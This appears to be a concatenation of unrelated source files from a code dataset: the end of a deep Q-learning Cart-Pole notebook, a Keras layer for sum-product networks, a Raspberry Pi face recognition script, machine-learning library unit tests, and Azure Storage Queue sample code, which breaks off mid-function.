Episode: 701 Total reward: 99.0 Training loss: 0.1050 Explore P: 0.0193
Episode: 704 Total reward: 99.0 Training loss: 0.1234 Explore P: 0.0189
Episode: 707 Total reward: 99.0 Training loss: 0.1407 Explore P: 0.0185
Episode: 709 Total reward: 160.0 Training loss: 0.0913 Explore P: 0.0182
Episode: 712 Total reward: 99.0 Training loss: 0.1815 Explore P: 0.0178
Episode: 715 Total reward: 99.0 Training loss: 0.1191 Explore P: 0.0174
Episode: 718 Total reward: 99.0 Training loss: 0.1073 Explore P: 0.0170
Episode: 721 Total reward: 99.0 Training loss: 0.1133 Explore P: 0.0167
Episode: 724 Total reward: 99.0 Training loss: 0.0898 Explore P: 0.0164
Episode: 727 Total reward: 99.0 Training loss: 0.1217 Explore P: 0.0160
Episode: 730 Total reward: 99.0 Training loss: 0.2150 Explore P: 0.0158
Episode: 733 Total reward: 99.0 Training loss: 0.0678 Explore P: 0.0155
Episode: 736 Total reward: 99.0 Training loss: 0.0872 Explore P: 0.0152
Episode: 739 Total reward: 99.0 Training loss: 0.1330 Explore P: 0.0150
Episode: 742 Total reward: 99.0 Training loss: 0.1116 Explore P: 0.0147
Episode: 745 Total reward: 99.0 Training loss: 0.1611 Explore P: 0.0145
Episode: 748 Total reward: 99.0 Training loss: 0.1307 Explore P: 0.0143
Episode: 751 Total reward: 99.0 Training loss: 0.0875 Explore P: 0.0141
Episode: 754 Total reward: 99.0 Training loss: 0.1344 Explore P: 0.0139
Episode: 757 Total reward: 99.0 Training loss: 0.0911 Explore P: 0.0137
Episode: 760 Total reward: 99.0 Training loss: 0.1224 Explore P: 0.0135
Episode: 763 Total reward: 99.0 Training loss: 0.0572 Explore P: 0.0133
Episode: 766 Total reward: 99.0 Training loss: 0.0757 Explore P: 0.0132
Episode: 769 Total reward: 99.0 Training loss: 0.0381 Explore P: 0.0130
Episode: 772 Total reward: 99.0 Training loss: 0.1698 Explore P: 0.0129
Episode: 775 Total reward: 99.0 Training loss: 0.0365 Explore P: 0.0127
Episode: 778 Total reward: 99.0 Training loss: 0.1805 Explore P: 0.0126
Episode: 781 Total reward: 99.0 Training loss: 0.1017 Explore P: 0.0125
Episode: 784 Total reward: 99.0 Training loss: 0.1112 Explore P: 0.0123
Episode: 787 Total reward: 99.0 Training loss: 0.0930 Explore P: 0.0122
Episode: 790 Total reward: 99.0 Training loss: 0.0693 Explore P: 0.0121
Episode: 793 Total reward: 99.0 Training loss: 0.0431 Explore P: 0.0120
Episode: 796 Total reward: 99.0 Training loss: 0.1168 Explore P: 0.0119
Episode: 799 Total reward: 99.0 Training loss: 0.1071 Explore P: 0.0118
Episode: 802 Total reward: 99.0 Training loss: 0.1360 Explore P: 0.0117
Episode: 805 Total reward: 99.0 Training loss: 0.0872 Explore P: 0.0117
Episode: 808 Total reward: 99.0 Training loss: 0.1197 Explore P: 0.0116
Episode: 811 Total reward: 99.0 Training loss: 0.0848 Explore P: 0.0115
Episode: 814 Total reward: 99.0 Training loss: 0.0515 Explore P: 0.0114
Episode: 817 Total reward: 99.0 Training loss: 0.1590 Explore P: 0.0114
Episode: 820 Total reward: 99.0 Training loss: 0.2080 Explore P: 0.0113
Episode: 823 Total reward: 99.0 Training loss: 0.1532 Explore P: 0.0112
Episode: 826 Total reward: 99.0 Training loss: 0.0622 Explore P: 0.0112
Episode: 829 Total reward: 99.0 Training loss: 0.0553 Explore P: 0.0111
Episode: 832 Total reward: 99.0 Training loss: 0.0746 Explore P: 0.0111
Episode: 835 Total reward: 99.0 Training loss: 0.1045 Explore P: 0.0110
Episode: 838 Total reward: 99.0 Training loss: 0.0929 Explore P: 0.0110
Episode: 841 Total reward: 99.0 Training loss: 0.1053 Explore P: 0.0109
Episode: 844 Total reward: 99.0 Training loss: 0.0877 Explore P: 0.0109
Episode: 847 Total reward: 99.0 Training loss: 0.0783 Explore P: 0.0108
Episode: 850 Total reward: 99.0 Training loss: 0.0724 Explore P: 0.0108
Episode: 853 Total reward: 99.0 Training loss: 0.1745 Explore P: 0.0107
Episode: 856 Total reward: 99.0 Training loss: 0.0334 Explore P: 0.0107
Episode: 859 Total reward: 99.0 Training loss: 0.0205 Explore P: 0.0107
Episode: 862 Total reward: 99.0 Training loss: 0.0674 Explore P: 0.0106
Episode: 865 Total reward: 99.0 Training loss: 0.1149 Explore P: 0.0106
Episode: 868 Total reward: 99.0 Training loss: 191.0773 Explore P: 0.0106
Episode: 871 Total reward: 99.0 Training loss: 0.1013 Explore P: 0.0106
Episode: 873 Total reward: 156.0 Training loss: 0.2140 Explore P: 0.0105
Episode: 874 Total reward: 185.0 Training loss: 0.1837 Explore P: 0.0105
Episode: 876 Total reward: 45.0 Training loss: 0.1855 Explore P: 0.0105
Episode: 877 Total reward: 55.0 Training loss: 0.0789 Explore P: 0.0105
Episode: 880 Total reward: 99.0 Training loss: 0.0890 Explore P: 0.0105
Episode: 882 Total reward: 185.0 Training loss: 0.0788 Explore P: 0.0105
Episode: 885 Total reward: 99.0 Training loss: 0.1397 Explore P: 0.0104
Episode: 888 Total reward: 99.0 Training loss: 0.0400 Explore P: 0.0104
Episode: 891 Total reward: 99.0 Training loss: 0.0962 Explore P: 0.0104
Episode: 894 Total reward: 99.0 Training loss: 0.1356 Explore P: 0.0104
Episode: 897 Total reward: 99.0 Training loss: 0.2037 Explore P: 0.0104
Episode: 900 Total reward: 99.0 Training loss: 0.0486 Explore P: 0.0103
Episode: 903 Total reward: 99.0 Training loss: 0.2492 Explore P: 0.0103
Episode: 906 Total reward: 99.0 Training loss: 0.1467 Explore P: 0.0103
Episode: 909 Total reward: 99.0 Training loss: 0.2217 Explore P: 0.0103
Episode: 912 Total reward: 99.0 Training loss: 0.1772 Explore P: 0.0103
Episode: 915 Total reward: 99.0 Training loss: 0.0898 Explore P: 0.0103
Episode: 918 Total reward: 99.0 Training loss: 0.0552 Explore P: 0.0103
Episode: 921 Total reward: 99.0 Training loss: 0.1267 Explore P: 0.0102
Episode: 924 Total reward: 99.0 Training loss: 0.3037 Explore P: 0.0102
Episode: 927 Total reward: 99.0 Training loss: 0.1654 Explore P: 0.0102
Episode: 930 Total reward: 99.0 Training loss: 0.1975 Explore P: 0.0102
Episode: 933 Total reward: 99.0 Training loss: 0.2122 Explore P: 0.0102
Episode: 936 Total reward: 99.0 Training loss: 0.0754 Explore P: 0.0102
Episode: 939 Total reward: 99.0 Training loss: 0.1481 Explore P: 0.0102
Episode: 942 Total reward: 99.0 Training loss: 0.0895 Explore P: 0.0102
Episode: 945 Total reward: 99.0 Training loss: 0.0690 Explore P: 0.0102
Episode: 948 Total reward: 99.0 Training loss: 0.0942 Explore P: 0.0102
Episode: 951 Total reward: 99.0 Training loss: 0.0567 Explore P: 0.0101
Episode: 954 Total reward: 99.0 Training loss: 0.0665 Explore P: 0.0101
Episode: 957 Total reward: 99.0 Training loss: 0.0645 Explore P: 0.0101
Episode: 960 Total reward: 99.0 Training loss: 224.4461 Explore P: 0.0101
Episode: 963 Total reward: 99.0 Training loss: 0.0508 Explore P: 0.0101
Episode: 966 Total reward: 99.0 Training loss: 0.0792 Explore P: 0.0101
Episode: 969 Total reward: 99.0 Training loss: 0.0754 Explore P: 0.0101
Episode: 972 Total reward: 99.0 Training loss: 0.0655 Explore P: 0.0101
Episode: 975 Total reward: 99.0 Training loss: 0.0686 Explore P: 0.0101
Episode: 978 Total reward: 99.0 Training loss: 0.0361 Explore P: 0.0101
Episode: 981 Total reward: 99.0 Training loss: 0.1777 Explore P: 0.0101
Episode: 984 Total reward: 99.0 Training loss: 0.0633 Explore P: 0.0101
Episode: 987 Total reward: 99.0 Training loss: 0.0559 Explore P: 0.0101
Episode: 990 Total reward: 99.0 Training loss: 0.0543 Explore P: 0.0101
Episode: 993 Total reward: 99.0 Training loss: 0.0833 Explore P: 0.0101
Episode: 996 Total reward: 99.0 Training loss: 0.1037 Explore P: 0.0101
Episode: 997 Total reward: 45.0 Training loss: 0.0619 Explore P: 0.0101
# ## Visualizing training
#
# Below we plot the total rewards for each episode. The rolling average is plotted in blue.
# In[ ]:
get_ipython().run_line_magic('matplotlib', 'inline')
import matplotlib.pyplot as plt
def running_mean(x, N):
cumsum = np.cumsum(np.insert(x, 0, 0))
return (cumsum[N:] - cumsum[:-N]) / N
# In[ ]:
eps, rews = np.array(rewards_list).T
smoothed_rews = running_mean(rews, 10)
plt.plot(eps[-len(smoothed_rews):], smoothed_rews)
plt.plot(eps, rews, color='grey', alpha=0.3)
plt.xlabel('Episode')
plt.ylabel('Total Reward')
# In[ ]:
Text(0,0.5,'Total Reward')
# 
#
#
# ## Playing Atari Games
#
# So, Cart-Pole is a pretty simple game. However, the same model can be used to train an agent to play something much more complicated like Pong or Space Invaders. Instead of a state like we're using here though, you'd want to use convolutional layers to get the state from the screen images.
#
# 
#
# I'll leave it as a challenge for you to use deep Q-learning to train an agent to play Atari games. Here's the original paper which will get you started: http://www.davidqiu.com:8888/research/nature14236.pdf.
| 61.176951 | 408 | 0.725766 |
9b57ca29b73179c1cb29363de366b8f4d93c6230 | 2,684 | py | Python | libspn_keras/layers/spatial_to_regions.py | twebr/libspn-keras | b5f107899795634f011b0e0bfedce182c0e87568 | [
"MIT"
] | 45 | 2020-02-23T22:01:13.000Z | 2021-09-10T19:24:40.000Z | libspn_keras/layers/spatial_to_regions.py | twebr/libspn-keras | b5f107899795634f011b0e0bfedce182c0e87568 | [
"MIT"
] | 16 | 2020-03-12T06:12:44.000Z | 2022-01-19T19:44:33.000Z | libspn_keras/layers/spatial_to_regions.py | twebr/libspn-keras | b5f107899795634f011b0e0bfedce182c0e87568 | [
"MIT"
] | 9 | 2020-02-24T13:06:16.000Z | 2021-11-09T22:59:32.000Z | from typing import Optional
from typing import Tuple
import tensorflow as tf
from tensorflow import keras
class SpatialToRegions(keras.layers.Layer):
"""
Reshapes spatial SPN layer to a dense layer.
The dense output has leading dimensions for scopes and decomps (which will be ``[1, 1]``).
"""
def build(self, input_shape: Tuple[Optional[int], ...]) -> None:
"""
Build the internal components for this layer.
Args:
input_shape: Shape of the input Tensor.
Raises:
ValueError: If dimensions are unknown.
"""
_, num_cells_vertical, num_cells_horizontal, num_nodes = input_shape
if num_cells_horizontal is None:
raise ValueError(
"Cannot compute shape with unknown number of horizontal cells"
)
if num_cells_vertical is None:
raise ValueError(
"Cannot compute shape with unknown number of vertical cells"
)
if num_nodes is None:
raise ValueError("Cannot compute shape with unknown number of nodes")
self._out_num_nodes = num_cells_vertical * num_cells_horizontal * num_nodes
def call(self, x: tf.Tensor, **kwargs) -> tf.Tensor:
"""
Compute region representation from spatial tensor.
Assumes that all nodes have the same scope along the spatial axes.
Args:
x: Spatial input.
kwargs: Remaining keyword arguments.
Returns:
A region representation of the input.
"""
shape = tf.shape(x)
return tf.reshape(x, [shape[0], 1, 1, self._out_num_nodes])
def compute_output_shape(
self, input_shape: Tuple[Optional[int], ...]
) -> Tuple[Optional[int], ...]:
"""
Compute output shape of the layer.
Args:
input_shape: Input shape of the layer.
Returns:
Tuple of ints holding the output shape of the layer.
Raises:
ValueError: When shape cannot be computed.
"""
num_batch, num_cells_vertical, num_cells_horizontal, num_nodes = input_shape
if num_cells_horizontal is None:
raise ValueError(
"Cannot compute shape with unknown number of horizontal cells"
)
if num_cells_vertical is None:
raise ValueError(
"Cannot compute shape with unknown number of vertical cells"
)
if num_nodes is None:
raise ValueError("Cannot compute shape with unknown number of nodes")
return num_batch, 1, 1, num_cells_vertical * num_cells_horizontal * num_nodes
| 33.135802 | 94 | 0.616617 |
eb02b7a5acfe49973df065f6e07d325d5c394c40 | 4,608 | py | Python | scripts/video.py | smxsm/facerec | a70a5f168b36dbc042cc2d9d433900c65a3db65b | [
"Apache-2.0"
] | null | null | null | scripts/video.py | smxsm/facerec | a70a5f168b36dbc042cc2d9d433900c65a3db65b | [
"Apache-2.0"
] | null | null | null | scripts/video.py | smxsm/facerec | a70a5f168b36dbc042cc2d9d433900c65a3db65b | [
"Apache-2.0"
] | null | null | null | import face_recognition
import cv2
import os
import time
import imutils
from imutils.video import VideoStream
from imutils.video import FPS
# This is a demo of running face recognition on live video from your webcam. It's a little more complicated than the
# other example, but it includes some basic performance tweaks to make things run a lot faster:
# 1. Process each video frame at 1/4 resolution (though still display it at full resolution)
# 2. Only detect faces in every other frame of video.
# PLEASE NOTE: This example requires OpenCV (the `cv2` library) to be installed only to read from your webcam.
# OpenCV is *not* required to use the face_recognition library. It's only required if you want to run this
# specific demo. If you have trouble installing it, try any of the other demos that don't require it instead.
known_face_encodings = []
known_face_names = []
def load_face_encoding(name, file_name):
image = face_recognition.load_image_file(file_name)
face_encoding = face_recognition.face_encodings(image)
if len(face_encoding) > 0:
known_face_encodings.append(face_encoding[0])
known_face_names.append(name)
print("Image loaded: {}".format(name))
else:
print("Unable load image: {}".format(name))
# Get a reference to webcam #0 (the default one)
#video_capture = cv2.VideoCapture(0)
#video_capture = VideoStream(src=0).start()
# use Raspbi cam
video_capture = VideoStream(usePiCamera=True).start()
time.sleep(2.0)
print("Loading images from {}".format(os.path.dirname(os.path.abspath(__file__))+"/bilder/"))
load_face_encoding("Stefan", os.path.dirname(os.path.abspath(__file__))+"/../bilder/beffy.jpg")
load_face_encoding("Erik", os.path.dirname(os.path.abspath(__file__))+"/../bilder/erik.jpg")
load_face_encoding("Mika", os.path.dirname(os.path.abspath(__file__))+"/../bilder/mika.jpg")
load_face_encoding("Sonja", os.path.dirname(os.path.abspath(__file__))+"/../bilder/sonja.jpg")
# Initialize some variables
face_locations = []
face_encodings = []
face_names = []
process_this_frame = True
while True:
# Grab a single frame of video
frame = video_capture.read()
# Resize frame of video to 1/4 size for faster face recognition processing
#small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)
#small_frame = imutils.resize(frame, width=500)
(h, w) = frame.shape[:2]
smallW = int(round(w*0.25))
#print("Breite {}!".format(smallW))
small_frame = frame #imutils.resize(frame, smallW)
# Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)
rgb_small_frame = small_frame[:, :, ::-1]
# Only process every other frame of video to save time
if process_this_frame:
# Find all the faces and face encodings in the current frame of video
face_locations = face_recognition.face_locations(rgb_small_frame)
face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)
face_names = []
for face_encoding in face_encodings:
# See if the face is a match for the known face(s)
# default tolerance is 0.6, the lesser the stricter
tolerance = 0.5
matches = face_recognition.compare_faces(known_face_encodings, face_encoding, tolerance)
name = "Unknown"
# If a match was found in known_face_encodings, just use the first one.
if True in matches:
first_match_index = matches.index(True)
name = known_face_names[first_match_index]
face_names.append(name)
print("Hello, {}".format(name))
process_this_frame = not process_this_frame
# Display the results
for (top, right, bottom, left), name in zip(face_locations, face_names):
# Scale back up face locations since the frame we detected in was scaled to 1/4 size
#top *= 4
#right *= 4
#bottom *= 4
#left *= 4
# Draw a box around the face
cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)
# Draw a label with a name below the face
cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)
# Display the resulting image
cv2.imshow('Video', frame)
# Hit 'q' on the keyboard to quit!
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# Release handle to the webcam
video_capture.release()
cv2.destroyAllWindows() | 40.069565 | 116 | 0.687066 |
8d7c237baa56a71961f7c17a8cca6654aa135362 | 12,694 | py | Python | tests/test_lib.py | git4satya/koleksyon | 966f3f6ea16a9c5c0bb12d2aec52c5c89e42090c | [
"MIT"
] | null | null | null | tests/test_lib.py | git4satya/koleksyon | 966f3f6ea16a9c5c0bb12d2aec52c5c89e42090c | [
"MIT"
] | null | null | null | tests/test_lib.py | git4satya/koleksyon | 966f3f6ea16a9c5c0bb12d2aec52c5c89e42090c | [
"MIT"
] | null | null | null | # the inclusion of the tests module is not meant to offer best practices for
# testing in general, but rather to support the `find_packages` example in
# setup.py that excludes installing the "tests" package
import unittest
import pandas as pd
import hashlib #should just be needed in testing to see if the contents of a generated file are correct
import koleksyon.lib as ll
import koleksyon.dta as dd
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split
#algorithms
from sklearn.neighbors import KNeighborsClassifier
from sklearn.linear_model import SGDClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import RandomForestRegressor
#testing datasets
from sklearn.datasets import load_breast_cancer
def check_contents(md5, filepath, ignore):
"""
md5 - the md5 sum calculated last time the data was validated as correct
filepath - the location/file where the new data is, this is to be validated
ignore - a list of regular expressions that should be thrown out, line by line in the comparison
"""
# Open,close, read file and calculate MD5 on its contents
with open(filepath,"r",encoding='utf-8') as file_to_check:
# read contents of the file
data = ""
lines = file_to_check.readlines()
for line in lines:
flag = True
for re in ignore:
if re in line:
flag = False #exclude this line, it's a date or something and will prevent the md5 from working
if flag:
data = data + line + "\n"
#print(data)
# pipe contents of the file through
md5_returned = hashlib.md5(data.encode('utf-8')).hexdigest()
print("Checking Contents Via Hash:")
print("Original: " + md5)
print("Calculated: " + md5_returned)
if md5 == md5_returned:
return True #md5 verified
else:
return False #md5 verification failed!
class TestLib(unittest.TestCase):
def test_find_mode_mode(self):
print("Testing Mode Mode...")
a = [1,1,2,2,3,3]
mm = ll.find_mode_mode(a)
self.assertEqual(mm, 2)
b = [1,2,3,3]
self.assertEqual(ll.find_mode_mode(b), 3)
c = [1,2,2,3,3]
self.assertEqual(ll.find_mode_mode(c), 2)
d = [1,1,2,3,3]
self.assertEqual(ll.find_mode_mode(d), 1)
e = [1,1,2,2,2,3,3]
self.assertEqual(ll.find_mode_mode(e), 2)
def test_dist_report(self):
print("Testing Distribution Report...")
df = pd.read_csv("../data/cars.csv")
report = ll.dist_report(df, 'MSRP')
#print(report) #pretty!
rt = str(report).split("\n")
#print(rt)
expected = [
"Statistics for Variable: MSRP",
"Number of Data Points: 11914",
"Min: 2000",
"Max: 2065902",
"Mean: 40594.737032063116",
"Mode: 2000",
"Variance: 60106.5809259237",
"Excess kurtosis of normal distribution (should be 0): 60106.5809259237",
"Skewness of normal distribution (should be 0): 11.770504957244958",
""
]
self.assertEqual(len(expected), len(rt))
i = 0
for i in range(0, len(expected)):
self.assertEqual(expected[i], rt[i])
def test_density_plot(self):
print("Testing Density Plot...")
# Correct original md5
original_md5 = '07e1b5ecbc2f03eb8a1e7dc3b586a751'
df = pd.read_csv("../data/cars.csv")
x = df['MSRP']
pltFile = ll.density_plot(x)
print(pltFile)
#check that the rendering is the same as what we expect for this data/variable
self.assertTrue(check_contents(original_md5, pltFile, ["<dc:date>", "style=", "path clip-path=", "clipPath id=", "xlink:href"]))
#TODO: this function needs to be redone! especially in light of the new encode library...
# def test_data_prep(self):
# print("Testing data_prep:")
# df = dd.load_parquet("../data/melbourne/", "melbourne_")
# #first, don't do anything to the data... should have same number of rows as original...
# X_train, X_test, y_train, y_test = ll.data_prep(df, 'Price', missing_strategy='none', test_size=1.0)
# self.assertEqual(len(df), len(X_test))
# self.assertEqual(len(df), len(y_test))
# X_train, X_test, y_train, y_test = ll.data_prep(df, 'Price', missing_strategy='droprow', test_size=1.0)
# #notice how this removes rows...
# self.assertEqual(1778, len(X_test))
# self.assertEqual(1778, len(y_test))
#def test_var_analysis(self):
# df = pd.read_csv("../data/cars.csv")
# print(df)
# ll.var_analysis(df, "MSRP")
######################################################################
#
# Accuracy Statistics Below...
# note the goal of AccuracyStats is not to replace sklearn,
# just to make sure people remember to calculate a variety of different summary statistics when they evaluate models!
# below we test:
# * classifier
# * regressor
#
######################################################################
#test based on: https://towardsdatascience.com/a-practical-guide-to-seven-essential-performance-metrics-for-classification-using-scikit-learn-2de0e0a8a040
def test_AccuracyStats_classifier(self):
print("Testing Accuracy Statistics on a Simple Classifier...")
#STEP 1: prep data
br_cancer = load_breast_cancer()
#note we could leverage the data prep functions in koleksyon to make this easier, but this is simpler for a test...
X, y = br_cancer['data'], br_cancer['target']
scaler = StandardScaler()
X_scaled = scaler.fit_transform(X)
X_train, X_test, y_train, y_test = train_test_split(X_scaled, y, test_size=0.3, random_state=42)
#create various different algorithms to test the performance statistics on them
knn_model = KNeighborsClassifier(n_neighbors=3)
knn_model.fit(X_train, y_train)
sgd_model = SGDClassifier(random_state=42)
sgd_model.fit(X_train, y_train)
log_model = LogisticRegression()
log_model.fit(X_train, y_train)
#create predictions...
y_pred_knn = knn_model.predict(X_test)
y_pred_sgd = sgd_model.predict(X_test)
y_pred_log = log_model.predict(X_test)
#calculate some statistics, one for each algorithm (usually, we don't have multiple algorithms, we have multiple runs)
astats_knn = ll.AccuracyStats('classifier')
stats_knn = astats_knn.calculate_stats(y_test, y_pred_knn)
astats_sgd = ll.AccuracyStats('classifier')
stats_sgd = astats_sgd.calculate_stats(y_test, y_pred_sgd)
astats_log = ll.AccuracyStats('classifier')
stats_log = astats_log.calculate_stats(y_test, y_pred_log)
#first check that we can get a string output from the stats calculations (check the individual values of the computations in next section)
#this is a handy way to just print the stats in the object...
knn_str = str(astats_knn)
print(knn_str)
self.assertGreater(len(knn_str), 1)
sgd_str = str(stats_sgd)
print(sgd_str)
self.assertGreater(len(sgd_str), 1)
log_str = str(astats_log)
print(log_str)
self.assertGreater(len(log_str), 1)
#check the accuracy statistics are correct
self.assertAlmostEqual(0.9590643274853801, stats_knn['accuracy_score']) #or astats_knn.accuracy_score, both work
self.assertAlmostEqual(0.9649122807017544, stats_sgd['accuracy_score'])
self.assertAlmostEqual(0.9824561403508771, stats_log['accuracy_score'])
#check the confusion matrix (TP/FP/TN/FN) is correct
# TP=59 | FP=4
# FN=3 | TN=105
self.assertEqual(59, astats_knn.true_positives) #or stats_knn['true_positives'], both work
self.assertEqual(4, astats_knn.false_positives)
self.assertEqual(3, astats_knn.false_negatives)
self.assertEqual(105, astats_knn.true_negatives)
# TP=61 | FP=2
# FN=4 | TN=104
self.assertEqual(61, astats_sgd.true_positives)
self.assertEqual(2, astats_sgd.false_positives)
self.assertEqual(4, astats_sgd.false_negatives)
self.assertEqual(104, astats_sgd.true_negatives)
# TP=62 | FP=1
# FN=2 | TN=106
self.assertEqual(62, astats_log.true_positives)
self.assertEqual(1, astats_log.false_positives)
self.assertEqual(2, astats_log.false_negatives)
self.assertEqual(106, astats_log.true_negatives)
#check the F1 statistics are correct
self.assertAlmostEqual(0.9558709677419355, stats_knn['f1_score']) #or astats_knn.f1_score, both work
self.assertAlmostEqual(0.962543808411215, stats_sgd['f1_score'])
self.assertAlmostEqual(0.9812122321919062, stats_log['f1_score'])
#check the precision statistics are correct
self.assertAlmostEqual(0.9365079365079365, stats_knn['precision']) #or astats_knn.f1_score, both work
self.assertAlmostEqual(0.9682539682539683, stats_sgd['precision'])
self.assertAlmostEqual(0.9841269841269841, stats_log['precision'])
#check the recall statistics are correct
self.assertAlmostEqual(0.9516129032258065, stats_knn['recall']) #or astats_knn.f1_score, both work
self.assertAlmostEqual(0.9384615384615385, stats_sgd['recall'])
self.assertAlmostEqual(0.96875, stats_log['recall'])
#check area under the curve (auc)
self.assertAlmostEqual(0.9543650793650794, stats_knn['roc_auc']) #or astats_knn.f1_score, both work
self.assertAlmostEqual(0.9656084656084655, stats_sgd['roc_auc'])
self.assertAlmostEqual(0.9828042328042328, stats_log['roc_auc'])
def test_AccuracyStats_regressor(self):
print("Testing Accuracy Statistics on a Simple Regressor...")
#pd.set_option('display.max_columns', None)
df = pd.read_csv("../data/imports85.csv")
# Prep the Data
#
#don't want to deal with the empty data nonsense
df = df.fillna(-1)
df = df.replace('?', -1)
print(df)
#the data is all catigorical, so we need to use some sort of encoder, a one-hot encoder is simple and makes the test clear, so we use that
#here we just use pandas... there are easier ways to encode stuff in the category encoders package (look in encode.py in this package!)
#-- just don't want a circular dependancy.. (don't use this in production, its also slow!)
columns = ['make','fuel-type','aspiration','num-of-doors','body-style','drive-wheels','engine-location', 'engine-type', 'num-of-cylinders', 'fuel-system'] #
i = 1
for col in columns:
one_hot = pd.get_dummies(df[col], prefix=str(i))
#drop the encoded stuff as it is now redundant
df = df.drop([col],axis = 1)
# join the dataframes
df = df.join(one_hot)
i = i + 1
print(df)
y = df['price']
X = df.drop(['price'], axis=1)
scaler = StandardScaler()
X_scaled = scaler.fit_transform(X)
X_train, X_test, y_train, y_test = train_test_split(X_scaled, y, test_size=0.3, random_state=42)
#build a simple algorithm, create predition
rf = RandomForestRegressor(n_estimators = 1000, random_state = 42)
rf.fit(X_train, y_train)
y_pred = rf.predict(X_test)
# calculate statistics -- the thing we are actually testing XooX!
#
rfstats = ll.AccuracyStats('regressor')
stats = rfstats.calculate_stats(y_test, y_pred)
print("Checking AccuracyStats for regression...")
print(stats)
#{'mean_squared_error': 12344135.436750872, 'mean_absolute_error': 1893.6762903225806, 'sqrt_mean_squared_error': 3513.422183107358, 'r2_score': 0.8329095430495994}
self.assertGreater(len(str(stats)), 1) #we have statistics in the generated string
self.assertAlmostEqual(12344135.436750872, rfstats.mean_squared_error) #or stats['mean_squared_error'] and so on for the next 3 tests
self.assertAlmostEqual(1893.6762903225806, rfstats.mean_absolute_error)
self.assertAlmostEqual(3513.422183107358, rfstats.sqrt_mean_squared_error)
self.assertAlmostEqual(0.8329095430495994, rfstats.r2_score)
if __name__ == '__main__':
unittest.main()
| 45.335714 | 172 | 0.650544 |
f5c72c54a120771f77a4012c5850c64376b2d21c | 9,453 | py | Python | sdk/storage/azure-storage-queue/samples/queue_samples_message.py | vbarbaresi/azure-sdk-for-python | 397ba46c51d001ff89c66b170f5576cf8f49c05f | [
"MIT"
] | 8 | 2021-01-13T23:44:08.000Z | 2021-03-17T10:13:36.000Z | sdk/storage/azure-storage-queue/samples/queue_samples_message.py | vbarbaresi/azure-sdk-for-python | 397ba46c51d001ff89c66b170f5576cf8f49c05f | [
"MIT"
] | null | null | null | sdk/storage/azure-storage-queue/samples/queue_samples_message.py | vbarbaresi/azure-sdk-for-python | 397ba46c51d001ff89c66b170f5576cf8f49c05f | [
"MIT"
] | null | null | null | # coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""
FILE: queue_samples_message.py
DESCRIPTION:
These samples demonstrate the following: creating and setting an access policy to generate a
sas token, getting a queue client from a queue URL, setting and getting queue
metadata, sending messages and receiving them individually or by batch, deleting and
clearing all messages, and peeking and updating messages.
USAGE:
python queue_samples_message.py
Set the environment variables with your own values before running the sample:
1) AZURE_STORAGE_CONNECTION_STRING - the connection string to your storage account
"""
from datetime import datetime, timedelta
import os
class QueueMessageSamples(object):
connection_string = os.getenv("AZURE_STORAGE_CONNECTION_STRING")
def set_access_policy(self):
# [START create_queue_client_from_connection_string]
from azure.storage.queue import QueueClient
queue = QueueClient.from_connection_string(self.connection_string, "myqueue1")
# [END create_queue_client_from_connection_string]
# Create the queue
queue.create_queue()
# Send a message
queue.send_message(u"hello world")
try:
# [START set_access_policy]
# Create an access policy
from azure.storage.queue import AccessPolicy, QueueSasPermissions
access_policy = AccessPolicy()
access_policy.start = datetime.utcnow() - timedelta(hours=1)
access_policy.expiry = datetime.utcnow() + timedelta(hours=1)
access_policy.permission = QueueSasPermissions(read=True)
identifiers = {'my-access-policy-id': access_policy}
# Set the access policy
queue.set_queue_access_policy(identifiers)
# [END set_access_policy]
# Use the access policy to generate a SAS token
# [START queue_client_sas_token]
from azure.storage.queue import generate_queue_sas
sas_token = generate_queue_sas(
queue.account_name,
queue.queue_name,
queue.credential.account_key,
policy_id='my-access-policy-id'
)
# [END queue_client_sas_token]
# Authenticate with the sas token
# [START create_queue_client]
token_auth_queue = QueueClient.from_queue_url(
queue_url=queue.url,
credential=sas_token
)
# [END create_queue_client]
# Use the newly authenticated client to receive messages
my_message = token_auth_queue.receive_messages()
finally:
# Delete the queue
queue.delete_queue()
def queue_metadata(self):
# Instantiate a queue client
from azure.storage.queue import QueueClient
queue = QueueClient.from_connection_string(self.connection_string, "myqueue2")
# Create the queue
queue.create_queue()
try:
# [START set_queue_metadata]
metadata = {'foo': 'val1', 'bar': 'val2', 'baz': 'val3'}
queue.set_queue_metadata(metadata=metadata)
# [END set_queue_metadata]
# [START get_queue_properties]
properties = queue.get_queue_properties().metadata
# [END get_queue_properties]
finally:
# Delete the queue
queue.delete_queue()
def send_and_receive_messages(self):
# Instantiate a queue client
from azure.storage.queue import QueueClient
queue = QueueClient.from_connection_string(self.connection_string, "myqueue3")
# Create the queue
queue.create_queue()
try:
# [START send_messages]
queue.send_message(u"message1")
queue.send_message(u"message2", visibility_timeout=30) # wait 30s before becoming visible
queue.send_message(u"message3")
queue.send_message(u"message4")
queue.send_message(u"message5")
# [END send_messages]
# [START receive_messages]
# Receive messages one-by-one
messages = queue.receive_messages()
for msg in messages:
print(msg.content)
# Receive messages by batch
messages = queue.receive_messages(messages_per_page=5)
for msg_batch in messages.by_page():
for msg in msg_batch:
print(msg.content)
queue.delete_message(msg)
# [END receive_messages]
# Only prints 4 messages because message 2 is not visible yet
# >>message1
# >>message3
# >>message4
# >>message5
finally:
# Delete the queue
queue.delete_queue()
def list_message_pages(self):
# Instantiate a queue client
from azure.storage.queue import QueueClient
queue = QueueClient.from_connection_string(self.connection_string, "myqueue4")
# Create the queue
queue.create_queue()
try:
queue.send_message(u"message1")
queue.send_message(u"message2")
queue.send_message(u"message3")
queue.send_message(u"message4")
queue.send_message(u"message5")
queue.send_message(u"message6")
# [START receive_messages_listing]
# Store two messages in each page
message_batches = queue.receive_messages(messages_per_page=2).by_page()
# Iterate through the page lists
print(list(next(message_batches)))
print(list(next(message_batches)))
# There are two iterations in the last page as well.
